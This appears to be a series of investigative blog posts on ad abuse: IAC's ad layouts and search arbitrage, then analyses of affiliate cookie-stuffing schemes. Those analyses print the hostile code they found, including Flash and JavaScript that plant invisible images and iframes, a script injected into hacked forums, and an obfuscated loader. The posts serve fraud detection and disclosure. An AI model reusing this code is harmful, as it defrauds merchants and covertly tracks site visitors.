The ad format at IAC Mywebsearch and Ask.com makes it particularly likely that users will mistake IAC ads for algorithmic results. For one, IAC omits any distinctive background color to help users distinguish ads from algorithmic results. Furthermore, IAC’s voluminous ads exceed beyond the first screen of results for many searches. A user familiar with Google would expect ads to have a distinctive background color and would know that ads typically rarely completely fill a screen — so seeing no such background color and similar-format results continuing for two full screens, the user might well conclude that these are algorithmic listings rather than paid advertisements.

Traffic Arbitrage

IAC buys traffic from Google and other search engines. The resulting sequence is needlessly convoluted: A user runs a search at Google, clicks an IAC ad purporting to offer what the user requested], then receives an IAC landing page with the very same ads just seen at Google. For example, I searched for [800 number look up] at Google and clicked an Ask ad. The resulting Ask page allocated most of its the above-the-fold space to three of the same ads I had just seen at Google! This process provides zero value to the user — indeed, negative value, in that the extra click adds time and confusion. But IAC monetizes its site unusually aggressively — for example, regularly putting four ads at the top of the page, where Google sometimes puts none and never presents more than three. Of course these extra ads serve IAC’s interest: By pushing a fraction of users to click multiple ads, IAC can more than cover its costs of buying the traffic from Google in the first place.

Longstanding Google rules exactly prohibit IAC’s search arbitrage. Google’s AdWords Policy Center instructs that “Google AdWords doesn’t allow the promotion of websites that are designed for the sole or primary purpose of showing ads.” Google continues: “One example of this kind of prohibited behavior is called arbitrage, where advertisers drive traffic to their websites at low cost and pay for that traffic by earning money from the ads placed on those websites”

Why isn’t Google enforcing its rules against arbitrage? An October 2012 Search Engine Land article quotes a reader who wrote to Google AdWords support, where a representative replied with unusual candor: “Since Ask.com is considered a Google product, they are able to serve ads at the top of the page when the search query is found to be relevant to their ads.” Of course Ask.com is not actually “a Google product” — it’s a Google syndicator, showing Google ads in exchange for a revenue share, just like thousands of other sites. But with IAC reportedly Google’s biggest advertising customer, special privileges would be less than surprising. Meanwhile, Google lets IAC do Google’s dirty work — showing extra ads to gullible users — which could let Google collect additional ad revenue from those users’ clicks. Still, that’s no help to users (who get pulled into extra page-views and less useful pages with more advertisements) or advertisers (whose costs increase as a result). And once the public recognizes Google’s role in authorizing this scheme, selling all advertising, and funding the entirety of IAC’s activity, Google ends up looking at least as culpable as IAC.

Ads with Oversized Clickable Areas

IAC ad promises 'free online television' but actually merely links to material already on the web; promises an 'app' but actually provides a search toolbar. Contrary to standard industry practice and Google rules, IAC makes the entire ad — including domain name, ad text, and large whitespace — into a clickable link. Notice the large clickable area flagged in the red box.

IAC ad promises 'free online television' but actually merely links to material already on the web; promises an 'app' but actually provides a search toolbar. At Google, only the ad itself is clickable. Not the much smaller red box.

IAC’s ads also flout industry practice and Google rules as to the size of an ad’s clickable area. Both in arbitrage landing pages and in toolbar results, IAC’s search result pages expand the clickable area of each advertisement to fill the entire page width, sharply increasing the fraction of the page where a click will be interpreted as a request to visit the advertiser’s page.

See the screenshot at right. (To create the red-outlined box showing the shape of the clickable area, I clicked an empty section of the ad and began a brief drag, causing my browser to highlight the ad’s clickable area in red as shown in the screenshot.)

Ask is an outlier in converting whitespace around an ad into a clickable area. Every other link on Ask.com landing pages — every link other than an advertisement — follows standard industry practice with only the words of the link being clickable, but not the surrounding whitespace. Indeed, at Google, Bing, and Yahoo, white space is never clickable. At Google and Bing, only ad titles are clickable, not ad domain names, or ad text. (See Google screenshot at right, showing the limited clickable area of a Google ad.) At Yahoo, only ad titles and domain names are clickable, not ad text or white space.

IAC has taken intentional action to expand its ads’ clickable area to cover all available width. As W3schools explains, “A block element is an element that takes up the full width available.” To expand ad hyperlinks to fill the entire width, Ask tags each ad hyperlink with the CSS STYLE of display:block.

<a id=”lindp” class=”ptbs pl20 pr30 ptsp pxl” style=”display:block;padding-bottom: 0px;” …

Google’s rules prohibit IAC’s expanded clickable areas. Google requires that “clicking on space surrounding an ad should not click the ad.” Yet IAC nonetheless makes a clickable area out of the area surrounding each ad, extending all the way to the right column.

IAC’s expanded ads invite accidental clicks. Accidental clicks are particularly likely from the inexperienced users IAC systematically targets for toolbar installations, and also from users searching on tablets, phones, and other touch devices. These extra clicks waste users’ time and drive up advertisers’ costs — but every such click yields extra revenue for IAC and Google.

What Comes Next

Google should enforce its rules strictly. No doubt IAC can offer Google some short-term revenue via extra ad-clicks from unsophisticated or confused users. But this isn’t the kind of business Google aspires to, and Google’s public statements indicate no interest in such bottom-feeding. Indeed, a fair application of Google’s existing AdWords rules would disallow both IAC’s toolbar ads (using AdWords to solicit installations) and IAC’s search arbitrage ads (using AdWords to send users to IAC pages presenting syndicated AdWords ads). Meanwhile, numerous Google AdSense rules are also on point, including prohibiting encouraging accidental clicks, prohibiting site layout that pushes content below the fold, and limiting the number of ads per page. So too for Software Principles requiring up-front disclosure as well as “easy” and complete uninstall.

As a publicly-traded company, IAC should benefit from the oversight and guidance of its outside directors. But the New York Times commented in 2011 that “IAC’s board is filled with high-powered friends of Mr. Diller,” calling into question the independence and effectiveness of IAC’s outside directors. Of particular note is Chelsea Clinton, who joined IAC’s board in September 2011. Ms. Clinton’s prior experience includes little obvious connection to Internet advertising or online business, suggesting that she might need to invest extra time to learn the details of IAC’s business. Yet she also has weighty commitments including ongoing doctoral studies, serving as an Assistant Vice Provost at NYU, and reporting as a special correspondent for the NBC Nightly News — calling into question the time she can devote to IAC matters. The Times questioned why IAC had brought in Ms. Clinton, concluding that “This is clearly an appointment made because of who she is, not what she has done.” Indeed, Ms. Clinton’s background means she will be held to a particularly high standard: if she fails to stop IAC’s bad practices, the public may reasonably ask whether she has done her duty as an outside director.

Recent research from Goldman analyst Heath Terry flags investor concerns at IAC’s tactics. In a December 4, 2012 report, Terry downgraded IAC to sell due to vulnerability from Google policy changes. A January 9, 2013 follow-up noted IAC changing its uninstall practices to comply with Google policy as well as slowdown in arbitrage. Terry flags some important factors, and I share his bottom line that IAC’s search practices are unsustainable. But the real shoe has yet to drop. If Google is embarrassed at IAC’s actions — and it should be — Google is easily able to put an end to this mess.

I prepared a portion of this article at the request of a client that prefers not to be listed by name. The client kindly agreed to let me include that research in this publicly-available posting.

Flash-Based Cookie-Stuffer Using Google AdSense to Claim Unearned Affiliate Commissions from Amazon with Wesley Brandi

Merchants face special challenges when operating large affiliate marketing programs: rogue affiliates can claim to refer users who would have purchased from those merchants anyway. In particular, rogue “cookie-stuffer” affiliates deposit cookies invisibly and unrequested — knowing that a portion of users will make purchases from large merchants in the subsequent days and weeks. This tactic is particularly effective in defrauding large merchants: the more popular a merchant becomes, the more users will happen to buy from that merchant within a given referral period.

To cookie-stuff at scale, an attacker needs a reliable and significant source of user traffic. In February we showed a rogue affiliate hacking forum sites to drop cookies when users merely browse forums. But that’s just one of many strategies. I previously found various cookie-stuffing on sites hoping to receive search traffic. In a 2009 complaint, eBay alleges that rogue affiliates used a banner ad network to deposit eBay affiliate cookies when users merely browsed web pages showing certain banner ads. See also my 2008 report of an affiliate using Yahoo’s Right Media ad network to deposit multiple affiliate cookies invisibly — defrauding security vendors McAfee and Symantec.

As the eBay litigation indicates, display advertising networks can be a mechanism for cookie-stuffing. Of course diligent ad networks inspect ads and refuse cookie-stuffers (among other forms of malvertising). So we were particularly surprised to see Google AdSense running ads that cookie-stuff Amazon.

The 'Review Different Headphones' ad actually drops Amazon Associates affiliate cookies.
This innocuous-looking banner ad sets Amazon Associates cookies invisibly.
The Imgwithsmiles attack

We have uncovered scores of web sites running the banner ad shown at right. On 40 sites, on various days from February 6 to May 2, our crawlers found this banner ad dropping Amazon Associates affiliate cookies automatically and invisibly. All 40 sites include display advertising from Google AdSense. Google returns a Flash ad from Imgwithsmiles. To an ordinary user, the ad looks completely innocuous — the unremarkable “review different headphones” image shown at right. However, the ad actually creates an invisible IMG (image) tag loading an Amazon Associates link and setting cookies accordingly. Here’s how:

First, the ad’s Flash code creates an invisible IMG tag (10×10 pixels) (yellow highlighting below) loading the URL http://imgwithsmiles.com/img/f/e.jpg (green).

function Stuff() {
  if (z < links.length) {
    txt.htmltext = links[z];
    z++;
    return(undefined);
  }
  clearinterval(timer);
}
links = new array();
links[0] = "<img src="http://imgwithsmiles.com/img/f/e.jpg" width="10" height="10"/>";z = 0;timer = setinterval(Stuff, 2000);

While /img/f/e.jpg features a .jpg extension consistent with a genuine image file, it is actually a redirect to an Amazon Associates link. See the three redirects preserved below (blue), including a tricky HTTPS redirect (orange) that would block many detection systems. Nonetheless, traffic ultimately ends up at Amazon with an Associates tag (red) specifying that affiliate charslibr-20 is to be paid for these referrals.

GET /img/f/e.jpg HTTP/1.0
Accept: */*
Accept-Language: en-US
Referer: http://pagead2.googlesyndication.com/pagead/imgad?id=CICAgICQvuXgahDQAhiYAjII3bQHU19r_Isx-flash-version: 10,3,183,7User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; ...)Host: imgwithsmiles.comConnection: Keep-AliveHTTP/1.1 302 Moved TemporarilyDate: Wed, 02 May 2012 19:56:59 GMTServer: Apache/2.2.21 (Unix) mod_ssl/2.2.21 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=174272468a212dd0862eabf8d956e4e0; path=/
Location: https://imgwithsmiles.com/img/kick/f/e.jpg
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html-

HTTPS redirect decoded via separate manual request
GET /img/kick/f/e.jpg HTTP/1.1 Accept: text/html, application/xhtml+xml, */* Accept-Language: en-US User-Agent: ... Accept-Encoding: gzip, deflate Host: imgwithsmiles.com Connection: Keep-AliveHTTP/1.1 302 Moved Temporarily Date: ... Server: Apache/2.2.21 (Unix) mod_ssl/2.2.21 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.17 Location: http://imgwithsmiles.com/img/t/f/e.jpg Content-Length: 0 Connection: close Content-Type: text/html-GET /img/t/f/e.jpg HTTP/1.0 Accept: */* Accept-Language: en-US x-flash-version: 10,3,183,7 User-Agent: Mozilla/4.0 (compatible; ...) Connection: Keep-Alive Host: imgwithsmiles.com Cookie: PHPSESSID=174272468a212dd0862eabf8d956e4e0HTTP/1.1 302 Moved TemporarilyDate: Wed, 02 May 2012 19:56:59 GMT Server: Apache/2.2.21 (Unix) mod_ssl/2.2.21 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.17 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Location: http://www.amazon.com/gp/product/B002L3RREQ?ie=UTF8&tag=charslibr-20 Content-Length: 0 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html

If a user happens to make a purchase from Amazon within the subsequent 24 hours, Amazon will pay a commission to this affiliate — even though the affiliate did nothing at all to cause or encourage the user to make that purchase.

Does Amazon know?

The available information does not reveal whether or not Amazon knew about this affiliate’s practices. Nor can we easily determine whether, as of the May 2, 2012 observations presented above, this affiliate was still in good standing and receiving payment for the traffic it sent to Amazon.

On one hand, Amazon is diligent and technically sophisticated. Because Amazon runs one of the web’s largest affiliate programs, Amazon is necessarily familiar with affiliate fraud. And Amazon has ample incentive to catch affiliate fraud: Every dollar paid to fraudulent affiliates is money completely wasted, coming straight from the bottom line.

On the other hand, we have observed this same affiliate cheating Amazon for three months nonstop. All told, we’ve seen this affiliate rotating through 49 different Associates IDs. If Amazon had caught the affiliate, we would have expected the affiliate to shift away from any disabled affiliate accounts, most likely by shifting traffic to new accounts. Of the 28 Associates IDs we observed during February 2012, we still saw 6 in use during May 2012 (month-to-date) — suggesting that while Amazon may be catching some of the affiliate’s traffic, Amazon probably is not catching it all.

A further indication of the affiliate’s earnings comes from the affiliate’s willingness to incur out-of-pocket costs to buy media (AdSense placements from Google) with which to deliver Amazon cookies. As best we can tell, Amazon is the affiliate’s sole source of revenue. Meanwhile, the affiliate must pay Google for the display ad inventory the affiliate receives. These direct incremental costs give the affiliate a clear incentive to cease operation if it concludes that payment from Amazon will not be forthcoming. From the affiliate’s ongoing actions we can infer that the affiliate finds this scheme profitable — that its earnings to date have exceeded its expenses to date.

How profitable is this affiliate’s attack? Conservatively, suppose 40% of users are Amazon shoppers and make an average of four purchases from Amazon per year. Then 0.4*4/365=0.44% of users are likely to make purchases from Amazon in any given 24-hour period. Suppose the affiliate buys 1,000,000 CPM impressions from Google. Then the affiliate will enjoy commission on 0.44%*1,000,000=4,384 purchases. At an average purchase size of $30 and a 6.5% commission, this would be $8,547 of revenue per million cookie-stuffing incidents. How much would the affiliate have to pay Google for 1,000,000 CPM impressions? We’ve seen this affiliate on a variety of sites, but largely sites in moderate to low-priced verticals. At $2 CPM, the affiliate’s costs would be $2,000 — meaning the affiliate would still be slightly profitable even if Amazon caught 3/4 of its affiliate IDs before the first payment!

We alerted our contact at Amazon Associates to our observations. We will update this post with any information Amazon provides.

Hack-Based Cookie-Stuffing by Bannertracker-Script with Wesley Brandi

Last month we presented an example cookie-stuffer using encoded JavaScript to drop scores of cookies invisibly. But how can such a cookie-stuffer get traffic to its site? Today’s example is particularly nefarious: Perpetrators using server bannertracker-script.com have hacked at least 29 different online discussion forums to add invisible code that lets them cookie-stuff forum visitors. Through this approach, perpetrators have gained access to a particularly large amount of traffic — letting them target all the more users.

Getting Traffic to Bannertracker-script

The perpetrators appear to be targeting a documented exploit in vBulletin (a popular forum discussion program built in PHP/MySQL) versions v4.x to v4.1.2. The exploit allows for a remote attacker to execute arbitrary PHP script as well as untrusted SQL queries. It was first reported in German in April 2011, then in English in January 2012. A video tutorial even offers step-by-step instructions on how to use this exploit.

Our automation systems have examined more than 500,000 sites, searching for code promoting the cookie-stuffers we are following. We have found numerous affected sites, including sites as popular as searchenginewatch.com (Alexa traffic rank #2045), webdeveloper.com (#2822) and redflagdeals.com (#3188) along with many more. Selected pages of these sites (typically the forum pages) embed hostile code from Bannertracker-script.

In each instance, the hostile code appears as a brief JavaScript addition to an otherwise-legitimate site. See the single line of inserted code highlighted in yellow below. Notably, the hostile code appears within a block of code embedding comScore tags (green highlighting below) — a place where site designers expect to see external JavaScript references, making the Bannertracker-script insertion that much less likely to be detected.

<!– Begin comScore Tag –>
<script type=”text/javascript” src=”http://www.bannertracker-script.com/banner/ads.php?a=big”></script>
<script type=”text/javascript”>document.write(“<img id=’img1′ height=’1′ width=’1′>”);
document.getElementById(“img1”).src=”http://beacon.scorecardresearch.com/scripts/beacon.dll? C1=2&C2=5915554&C3=5915554&C4=www.redflagdeals.com &C5=&C6=&C7=” + escape(window.location.href) + “&C8=” + escape(document.title) + “&C9=” + escape(document.referrer) + “&rn=” + Math.floor(Math.random()*99999999);</script><!– End comScore Tag –>

Examining Bannertracker-script insertions on other sites, we found them in other inconspicuous places — for example, just before the </HTML> tag that ends a page.

Cookie-Stuffing by Bannertracker-script

As a result of the hack-based code insertion shown above, a user visiting any affected site receives Bannertracker-script code also. That code creates an invisible IFRAME which loads the Amazon site via an affiliate link. Here’s how: First, the code creates a doubly-invisible DIV (CSS style of display:hidden and visibility:none, shown in blue highlighting below). The code then creates an invisible IFRAME within that DIV (CSS display:none, visibility:hidden, size of 0x0 pixels, shown in purple highlighting below). The code instructs that the DIV load a URL on Http-uptime.com (grey) which redirects through to an Amazon Associates affiliate link with affiliate ID camerlucidpho-20 (red). See also the full packet log.

GET /banner/ads.php?a=big HTTP/1.1 …
Referer: http://forums.redflagdeals.com/ …
Host: www.bannertracker-script.com

HTTP/1.1 200 OK …
GPad = {
init: function () {
document.write(‘<div id=”GPAD” style=”visibility:hidden; display:none;”></div>’);
var frame = document.createElement(‘iframe’);
frame.setAttribute(‘src’, ‘http://www.http-uptime.com/banner/index.php‘);
frame.setAttribute(‘style’, ‘display:none; width: 0px; height 0px; border: none; visibility:hidden‘);
frame.style.visibility = ‘hidden’;
frame.style.display = ‘none’;
var div = document.getElementById(‘GPAD’);
div.appendChild(frame);
}
}
GPad.init();

GET /index.php HTTP/1.1 …
Referer: http://forums.redflagdeals.com/ …
Host: www.http-uptime.com

HTTP/1.1 200 OK …
<html><head><meta http-equiv=”refresh” content=”0;url=http://www.http-uptime.com/icons/blank.php?url=http%3A%2F%2Fwww.amazon.com%2Fgp%2Fsearch%3Fie%3DUTF8%26keywords%3D%26tag%3Dcamerlucidpho-20%26index%3Dpc-hardware%26linkCode%3Dur2%26camp%3D1789%26creative%3D932″ />
</head></html>

GET /icons/blank.php?url=http%3A%2F%2Fwww.amazon.com%2Fgp%2Fsearch%3Fie%3DUTF8%26keywords%3D%26tag%3Dcamerlucidpho-20%26index%3Dpc-hardware%26linkCode%3Dur2%26camp%3D1789%26creative%3D932 HTTP/1.1 …
Host: www.http-uptime.com

HTTP/1.1 302 Moved Temporarily …
Location: http://www.amazon.com/gp/search?ie=UTF8&keywords=&tag=camerlucidpho-20&index=pc-hardware&linkCode=ur2&camp=1789&creative=932

The net effect is to load Amazon’s site invisibly. Amazon operates using a 24-hour referral period, so if a user happened to make a purchase from Amazon within the next 24 hours, Amazon would credit this affiliate as the putative referer of the traffic — paying this affiliate a commission of at least 4% and as much as 15%.

Concealment by Bannertracker-script

The preceding discussion noted two mechanisms by which Bannertracker-script attempted to conceal its actions. First, it placed its tags within the comScore section of affected sites, where unfamiliar code is less likely to attract suspicion. Second, it loaded its tags invisibly, including via the multiple nested invisible elements detailed above. Still, by sending so much to Amazon, Bannertracker-script clearly recognized that it risked attracting scrutiny from Amazon, which might question how one affiliate obtained so much traffic. Bannertracker-script therefore turned to multiple Amazon Associates ID’s. In our testing, we found more than 200 such IDs of which we report 20 below:

abacemedi-20 aledesoftw-20 anybr-20 arizonosteopc-20  
actkid-20 allesbluefree-20 apa0c5-20 artofdri-20
adirooutdocom-20    alsjopa-20 apitherapy03-20   astba-20
afrkilbeemov-20 amergumbmachc-20    apitroservic-20 atlcitgam-20
ajelcand-20 ancestorville-20 arasmazi-20 babblu-20

Using multiple IDs raises a further risk for Bannertracker-script: A diligent investigator might request the Bannertracker-script site repeatedly in order to attempt to learn most or all of Bannertracker-script’s IDs. Bannertracker-script attempted to reduce this risk via server-side logic to avoid serving the same user with two different ID’s, based on variables that seem to include client IP address, HTTP User-agent header, and more.

In principle, investigators might recognize Bannertracker-script by its distinctive domain name. But in fact we have seen this perpetrator also using other domain names. (We refer to the perpetrator as Bannertracker-script because that was the first such domain we found and, in our testing, still the most frequent.)

Affected Merchants

To date, we have primarily seen Bannertracker-script targeting Amazon. But other merchants are vulnerable to similar attacks that drop a large number of cookies invisibly in hopes that users make purchases from the corresponding merchants. In this regard, large merchants are particularly vulnerable: The more popular a merchant is, the greater the likelihood of a given user making a purchase from that merchant in a given time period. Indeed, we have also seen Bannertracker-script using the same technique to drop cookies for several adult web sites

Amazon’s exposure is somewhat reduced by its 24-hour affiliate commission window — paying commission to affiliates only on a user’s purchases within 24 hours of invocation of an affiliate link, whereas other merchants often grant credit for as long as 30 days. But Amazon’s large and growing popularity limits the effectiveness of this measure. Conservatively, suppose 40% of users are Amazon shoppers and make an average of four purchases from Amazon per year. Then 0.4*4/365=0.44% of users are likely to make purchases from Amazon in any given 24-hour period. If Bannertracker-script can deposit one million Amazon cookies, via hacks of multiple popular sites, it will enjoy commission on 0.44%*1,000,000=4,384 purchases. At an average purchase size of $30 and a 6.5% commission, this would be $8,547 of revenue per million cookie-stuffing incidents — substantial revenue, particularly given the prospect of hacking other vulnerable web sites. Ordinarily, one might expect Amazon to notice a new affiliate with a large spike in earnings. But by spreading its commissions across hundreds of affiliate accounts, Bannertracker-script may avoid or deflect such scrutiny.

We have reported this matter to our contacts at Amazon and will update this post with any information Amazon cares to share.

Large-Scale Cookie-Stuffing at Eshop600.co.uk with Wesley Brandi

We have recently been testing web sites that drop affiliate cookies invisibly — claiming to have referred users to the corresponding merchants’ sites, when in fact users never asked to visit the merchants’ sites and never saw the merchants’ sites. Nonetheless, through invisible IFRAMEs, invisible IMG tags, and similar constructs, these pages manage to set affiliate cookies indicating that referrals occurred. Then, if users happen to make purchases from the targeted merchants, the cookie-stuffers collect affiliate commissions. With commissions as large as 40%, this tactic can be lucrative.

One large offender we recently found: Eshop600.co.uk. In automated and manual testing, we found 36 pages on the Eshop600 site, including the site’s home page, which drop dozens of cookies invisibly. To a user glancing at a web browser, the Eshop600 site looks perfectly normal:

The Eshop600 site

But within the affected Eshop600 pages are 26 blocks of encoded JavaScript code. An example:

var i,y,x="3c696d672069643d22706963333722207372633d22....";y="";var _0x70c3=["x6Cx65x6Ex67x74x68","x25","x73x75x62x73x74x72","x77x72x69x74x65"];for(i=0;i<x[_0x70c3[0]];i+=2){ y+=unescape(_0x70c3[1]+x[_0x70c3[2]](i,2));} ;document[_0x70c3[3]](y);

We decoded this JavaScript to find an invisible IMG tag.

<img width="75" height="100" id="pic37" style="display: none;" alt=" " src="http://www.tkqlhce.com/click-3910892-5590799"/>

Note the CSS STYLE of display:none (yellow highlighting) which makes the entire tag invisible. In any event, the 75×100 size (green highlighting) is too small to load a genuine web page. Nonetheless, a trace of the redirect sequence shows that the IMG does indeed redirect through an affiliate network (ValueClick’s Commission Junction) (red) and on to an affiliate merchant (blue).

GET /click-3910892-5590799 HTTP/1.1Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5Referer: http://www.eshop600.co.uk/discount-voucher-codes.htmlAccept-Language: en-USUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)Accept-Encoding: gzip, deflateHost: www.tkqlhce.comConnection: Keep-AliveHTTP/1.1 302 FoundServer: Resin/3.1.8P3P: policyref="http://www.tkqlhce.com/w3c/p3p.xml", CP="ALL BUS LEG DSP COR ADM CUR DEV PSA OUR NAV INT"Cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0Pragma: no-cacheExpires: Mon, 30 Jan 2012 00:26:02 GMTLocation: http://www.apmebf.com/oq68y1A9S/18D/VVZQXZZ/TZRQYZS/Q/Q/Q?i=y<<7JJF%3A%2F%2FMMM.JAGB724.2EC%3AYQ%2F2B82A-TZRQYZS-VVZQXZZ<<g<7JJF%3A%2F%2FMMM.4I7EFWQQ.2E.KA%2F38I2EKDJ-LEK274H-2E34I.7JCB<Content-Type: text/htmlConnection: closeTransfer-Encoding: chunkedDate: Mon, 30 Jan 2012 00:26:01 GMT---GET /oq68y1A9S/18D/VVZQXZZ/TZRQYZS/Q/Q/Q?i=y<<7JJF%3A%2F%2FMMM.JAGB724.2EC%3AYQ%2F2B82A-TZRQYZS-VVZQXZZ<<g<7JJF%3A%2F%2FMMM.4I7EFWQQ.2E.KA%2F38I2EKDJ-LEK274H-2E34I.7JCB< HTTP/1.1Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5Referer: http://www.eshop600.co.uk/discount-voucher-codes.htmlAccept-Language: en-USUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)Accept-Encoding: gzip, deflateConnection: Keep-AliveHost: www.apmebf.comHTTP/1.1 302 FoundServer: Resin/3.1.8P3P: policyref="http://www.apmebf.com/w3c/p3p.xml", CP="ALL BUS LEG DSP COR ADM CUR DEV PSA OUR NAV INT"Cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0Pragma: no-cacheExpires: Mon, 30 Jan 2012 00:26:07 GMTLocation: http://www.kdukvh.com/rb101ox54P/x38/QQULSUU/OUMLTUN/L/MADTPECKMRPTMTONUQKMONSTTOMRSQQPKSL/LLTzyMTvPvyUMMzMTLNvLLNOvz--MQxN?u=x<dkp!j8bl-u5it4xtn<iuuq%3A%2F%2Fxxx.ulrmidf.dpn%3A91%2Fdmjdl-4A219A3-66A18AA<<H<iuuq%3A%2F%2Fxxx.ftipq711.dp.vl%2Fejtdpvou-wpvdifs-dpeft.iunm<Set-Cookie: S=1qt84us-1648183295-1327883167554-70; domain=.apmebf.com; path=/; expires=Sat, 28-Jan-2017 00:26:07 GMTSet-Cookie: LCLK=cjo!i7ak-t4hs3wsm; domain=.apmebf.com; path=/; expires=Sat, 28-Jan-2017 00:26:07 GMTContent-Type: text/htmlConnection: closeTransfer-Encoding: chunkedDate: Mon, 30 Jan 2012 00:26:07 GMT---GET /rb101ox54P/x38/QQULSUU/OUMLTUN/L/MADTPECKMRPTMTONUQKMONSTTOMRSQQPKSL/LLTzyMTvPvyUMMzMTLNvLLNOvz--MQxN?u=x<dkp!j8bl-u5it4xtn<iuuq%3A%2F%2Fxxx.ulrmidf.dpn%3A91%2Fdmjdl-4A219A3-66A18AA<<H<iuuq%3A%2F%2Fxxx.ftipq711.dp.vl%2Fejtdpvou-wpvdifs-dpeft.iunm< HTTP/1.1Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5Referer: http://www.eshop600.co.uk/discount-voucher-codes.htmlAccept-Language: en-USUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)Accept-Encoding: gzip, deflateConnection: Keep-AliveHost: www.kdukvh.comHTTP/1.1 302 FoundServer: Resin/3.1.8P3P: policyref="http://www.kdukvh.com/w3c/p3p.xml", CP="ALL BUS LEG DSP COR ADM CUR DEV PSA OUR NAV INT"Cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0Pragma: no-cacheExpires: Mon, 30 Jan 2012 00:26:18 GMTLocation: http://www.argos.co.uk/webapp/wcs/stores/servlet/ArgosCreateReferral?storeId=10001&referrer=COJUN&cmpid=COJUN&referredURL=&_%24ja=tsid%3A11674%7Cprd%3A3910892Set-Cookie: LCLK=cjo!i7ak-t4hs3wsm; domain=.kdukvh.com; path=/; expires=Sat, 28-Jan-2017 00:26:18 GMTSet-Cookie: S=1qt84us-1648183295-1327883167554-70; domain=.kdukvh.com; path=/; expires=Sat, 28-Jan-2017 00:26:18 GMTSet-Cookie: PBLP=849260:3910892:1327883178648:cjo; path=/; expires=Sat, 28-Jan-2017 00:26:18 GMTContent-Type: text/htmlConnection: closeTransfer-Encoding: chunkedDate: Mon, 30 Jan 2012 00:26:18 GMT

Of course www.argos.co.uk is just one of dozens of merchants affected. Below are 26 merchants we’ve found targeted by Eshop600, including merchants using affiliate networks Affiliate Window (AW), Commission Junction (CJ), TradeDoubler (TD), and Perfiliate (now owned by Affiliate Window).

direct.asda.com (AW) www.britishairways.com (AW)
www.dorothyperkins.com (AW) www.screwfix.com (AW)
groceries.asda.com (Perfiliate) www.burton.co.uk (AW)
www.evans.co.uk (AW) www.sky.com (AW)
phone-shop.tesco.com (TD) www.comet.co.uk (AW)
www.halfords.com (AW) www.tesco.com (TD)
store.three.co.uk (Perfiliate) www.currys.co.uk (AW)
www.hsamuel.co.uk (AW) www.vodafone.co.uk (AW)
www.annsummers.com (AW) www.debenhams.com (AW)
www.johnlewis.com (AW) www.wilkinsonplus.com (AW)
www.argos.co.uk (CJ) www.dixons.co.uk (AW)
www.missselfridge.com (AW) www.asda.co.uk (Perfiliate)
www.diy.com (AW) www.pcworld.co.uk (AW)  

Beyond encoded JavaScript, Eshop600 also tried other methods to avoid detection. Load an Eshop600 page repeatedly, and it won’t stuff cookies every time; the site is clearly attempting to recognize repeat visitors to avoid restuffing the same users more than once. That makes Eshop600’s practice harder to replicate (an extra challenge for anyone trying to prove an infraction) and helps reduce telltale signs in merchants’ logs.

On one view, these practices are nothing new: Ben has been writing these up since 2004. But affiliate merchants and networks need to remain vigilant to catch these cheaters. We’re finding many dozens of affiliate cookie-stuffers per month, along with other rogue affiliates using spyware/adware, typosquatting, and more. It’s not unusual for cheaters to be among a merchants’ largest affiliates; for example, the 2010 indictment of Shawn Hogan alleges that he was the single largest affiliate in eBay’s affiliate program in 2006-2007, collecting more than $15 million over 18 months. Now, most affiliate programs are far smaller than eBay’s, yielding a correspondingly lower opportunity for fraud. But for mid-sized merchants, there are typically large savings in catching and ejecting all rule-breakers.

Revisiting Unlawful Advertisements at Google

Last week, Google’s 10-Q disclosed a $500 million charge “in connection with a potential resolution of an investigation by the US Department of Justice into the use of Google advertising by certain advertisers.” Google initially declined to say more, but a Wall Street Journal report revealed that the charge resulted from Google’s sale of advertising to online pharmacies that break US laws.

While Google has certainly profited from selling advertisements to rogue pharmacies, that’s just one of many areas where Google sells unlawful advertisements. Here are six other areas where I’ve also seen widespread unlawful AdWords advertisements:

  • Advertisements charging for something that’s actually free. I’ve documented scores of AdWords advertisements that attempt to trick users into paying for software that’s widely available for free — charging for RealPlayer, Skype, WinZip, and more.
  • Advertisements promising “free” service but actually imposing a charge. I have also flagged dozens of advertisements promising “100% complimentary” “free” “no obligation” service that actually comes with a monthly charge, typically $9.99/month or more. Promising “free” ringtones, these services rarely ask users for their credit card numbers. Instead, they post charges straight onto users’ mobile phone bills — combining carrier-direct billing with deceptive advertising claims in order to strengthen the illusion of “free” service.
  • Copyright infringement – advertisements touting tools for infringing audio and video downloads. For example, in 2007 media companies uncovered Google selling advertisements to various download sites, typically folks charging for Bittorrent clients. These programs helped users download movies without permission from the corresponding rights-holders, which is a double-whammy to copyright holders: Not only did labels, studios, artists, and filmmakers get no share of users’ payments, but users’ payments flowed to those making tools to facilitate infringement.
  • Copyright infringement – advertisements touting counterfeit software. For example, Rosetta Stone in six months notified Google of more than 200 instances in which AdWords advertisers offered counterfeit Rosetta Stone software.
  • Advertisements for programs that bundle spyware/adware. At the peak of the spyware and adware mess a few years ago, distributors of unsavory software used AdWords to distribute their wares. For example, a user searching for “screensavers” would receive a mix of advertisements — some promoting software that worked as advertised; others bundling screensavers with advertising and/or tracking software, with or without disclosure.
